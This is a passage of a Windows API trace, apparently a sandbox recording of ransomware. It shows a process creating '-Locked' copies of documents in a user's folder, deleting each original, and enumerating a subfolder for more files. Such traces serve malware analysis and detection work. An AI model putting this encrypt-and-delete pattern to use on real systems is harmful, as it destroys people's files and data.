lpOldMode=0x1af07c) returned 1 [0299.201] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.202] GetFileType (hFile=0x498) returned 0x1 [0299.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.202] GetFileType (hFile=0x498) returned 0x1 [0299.204] CloseHandle (hObject=0x498) returned 1 [0299.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc", lpFilePart=0x0) returned 0x2c [0299.205] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc")) returned 1 [0299.207] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", lpFilePart=0x0) returned 0x34 [0299.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.208] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.208] GetFileType (hFile=0x498) returned 0x1 [0299.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.209] GetFileType (hFile=0x498) returned 0x1 [0299.212] CloseHandle (hObject=0x498) returned 1 [0299.212] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf", lpFilePart=0x0) returned 0x2d [0299.213] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf")) returned 1 [0299.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", lpFilePart=0x0) returned 0x3e [0299.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.215] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.216] GetFileType (hFile=0x498) returned 0x1 [0299.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.216] GetFileType (hFile=0x498) returned 0x1 [0299.220] CloseHandle (hObject=0x498) returned 1 [0299.220] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx", lpFilePart=0x0) returned 0x37 [0299.221] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx")) returned 1 [0299.224] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", lpFilePart=0x0) returned 0x3f [0299.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.224] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.225] GetFileType (hFile=0x498) returned 0x1 [0299.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.225] GetFileType (hFile=0x498) returned 0x1 [0299.227] CloseHandle (hObject=0x498) returned 1 [0299.228] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots", lpFilePart=0x0) returned 0x38 [0299.228] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots")) returned 1 [0299.230] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", lpFilePart=0x0) returned 0x3d [0299.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.230] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.231] GetFileType (hFile=0x498) returned 0x1 [0299.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.231] GetFileType (hFile=0x498) returned 0x1 [0299.234] CloseHandle (hObject=0x498) returned 1 [0299.234] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc", lpFilePart=0x0) returned 0x36 [0299.234] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc")) returned 1 [0299.237] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", lpFilePart=0x0) returned 0x36 [0299.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.238] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.238] GetFileType (hFile=0x498) returned 0x1 [0299.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.238] GetFileType (hFile=0x498) returned 0x1 [0299.241] CloseHandle (hObject=0x498) returned 1 [0299.248] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc", lpFilePart=0x0) returned 0x2f [0299.248] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc")) returned 1 [0299.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", lpFilePart=0x0) returned 0x3e [0299.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.251] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.251] GetFileType (hFile=0x498) returned 0x1 [0299.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.251] GetFileType (hFile=0x498) returned 0x1 [0299.254] CloseHandle (hObject=0x498) returned 1 [0299.254] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx", lpFilePart=0x0) returned 0x37 [0299.254] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx")) returned 1 [0299.256] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", lpFilePart=0x0) returned 0x3f [0299.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.256] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.257] GetFileType (hFile=0x498) returned 0x1 [0299.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.257] GetFileType (hFile=0x498) returned 0x1 [0299.259] CloseHandle (hObject=0x498) returned 1 [0299.261] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx", lpFilePart=0x0) returned 0x38 [0299.261] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx")) returned 1 [0299.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", lpFilePart=0x0) returned 0x37 [0299.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.264] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.267] GetFileType (hFile=0x498) returned 0x1 [0299.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.268] GetFileType (hFile=0x498) returned 0x1 [0299.270] CloseHandle (hObject=0x498) returned 1 [0299.270] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx", lpFilePart=0x0) returned 0x30 [0299.271] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx")) returned 1 [0299.272] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", lpFilePart=0x0) returned 0x2f [0299.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.272] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.273] GetFileType (hFile=0x498) returned 0x1 [0299.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.273] GetFileType (hFile=0x498) returned 0x1 [0299.275] CloseHandle (hObject=0x498) returned 1 [0299.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf", lpFilePart=0x0) returned 0x28 [0299.276] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf")) returned 1 [0299.277] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", lpFilePart=0x0) returned 0x3c [0299.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.278] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.278] GetFileType (hFile=0x498) returned 0x1 [0299.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.278] GetFileType (hFile=0x498) returned 0x1 [0299.281] CloseHandle (hObject=0x498) returned 1 [0299.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx", lpFilePart=0x0) returned 0x35 [0299.281] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx")) returned 1 [0299.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0299.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0299.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0299.283] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.284] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.284] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81eedf0, ftCreationTime.dwHighDateTime=0x1d7d7bf, ftLastAccessTime.dwLowDateTime=0xe5b8b4e0, ftLastAccessTime.dwHighDateTime=0x1d7d9be, ftLastWriteTime.dwLowDateTime=0xe5b8b4e0, ftLastWriteTime.dwHighDateTime=0x1d7d9be, nFileSizeHigh=0x0, nFileSizeLow=0x4594, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods", cAlternateFileName="BVTEJK~1.ODS")) returned 1 [0299.284] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c814f0, ftCreationTime.dwHighDateTime=0x1d7dfac, ftLastAccessTime.dwLowDateTime=0x6305dab0, ftLastAccessTime.dwHighDateTime=0x1d7e16a, ftLastWriteTime.dwLowDateTime=0x6305dab0, ftLastWriteTime.dwHighDateTime=0x1d7e16a, nFileSizeHigh=0x0, nFileSizeLow=0x13655, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx", cAlternateFileName="MIKC8R~1.PPT")) returned 1 [0299.284] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadef4da0, ftCreationTime.dwHighDateTime=0x1d7d89f, ftLastAccessTime.dwLowDateTime=0x59a3f9f0, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0x59a3f9f0, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x7bf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx", cAlternateFileName="PPL3T~1.XLS")) returned 1 [0299.285] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b030de0, ftCreationTime.dwHighDateTime=0x1d7d7b4, ftLastAccessTime.dwLowDateTime=0xc0eb5ae0, ftLastAccessTime.dwHighDateTime=0x1d7dbcc, ftLastWriteTime.dwLowDateTime=0xc0eb5ae0, ftLastWriteTime.dwHighDateTime=0x1d7dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x525a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf", cAlternateFileName="RRSHMO~1.PDF")) returned 1 [0299.285] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.285] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0299.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0299.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0299.286] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0299.286] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0299.286] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.286] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.287] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81eedf0, ftCreationTime.dwHighDateTime=0x1d7d7bf, ftLastAccessTime.dwLowDateTime=0xe5b8b4e0, ftLastAccessTime.dwHighDateTime=0x1d7d9be, ftLastWriteTime.dwLowDateTime=0xe5b8b4e0, ftLastWriteTime.dwHighDateTime=0x1d7d9be, nFileSizeHigh=0x0, nFileSizeLow=0x4594, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods", cAlternateFileName="BVTEJK~1.ODS")) returned 1 [0299.287] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c814f0, ftCreationTime.dwHighDateTime=0x1d7dfac, ftLastAccessTime.dwLowDateTime=0x6305dab0, ftLastAccessTime.dwHighDateTime=0x1d7e16a, ftLastWriteTime.dwLowDateTime=0x6305dab0, ftLastWriteTime.dwHighDateTime=0x1d7e16a, nFileSizeHigh=0x0, nFileSizeLow=0x13655, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx", cAlternateFileName="MIKC8R~1.PPT")) returned 1 [0299.288] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadef4da0, ftCreationTime.dwHighDateTime=0x1d7d89f, ftLastAccessTime.dwLowDateTime=0x59a3f9f0, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0x59a3f9f0, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x7bf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx", cAlternateFileName="PPL3T~1.XLS")) returned 1 [0299.288] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b030de0, ftCreationTime.dwHighDateTime=0x1d7d7b4, ftLastAccessTime.dwLowDateTime=0xc0eb5ae0, ftLastAccessTime.dwHighDateTime=0x1d7dbcc, ftLastWriteTime.dwLowDateTime=0xc0eb5ae0, ftLastWriteTime.dwHighDateTime=0x1d7dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x525a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf", cAlternateFileName="RRSHMO~1.PDF")) returned 1 [0299.288] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b030de0, ftCreationTime.dwHighDateTime=0x1d7d7b4, ftLastAccessTime.dwLowDateTime=0xc0eb5ae0, ftLastAccessTime.dwHighDateTime=0x1d7dbcc, ftLastWriteTime.dwLowDateTime=0xc0eb5ae0, ftLastWriteTime.dwHighDateTime=0x1d7dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x525a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf", cAlternateFileName="RRSHMO~1.PDF")) returned 0 [0299.288] FindClose (in: hFindFile=0x737a28 | out: 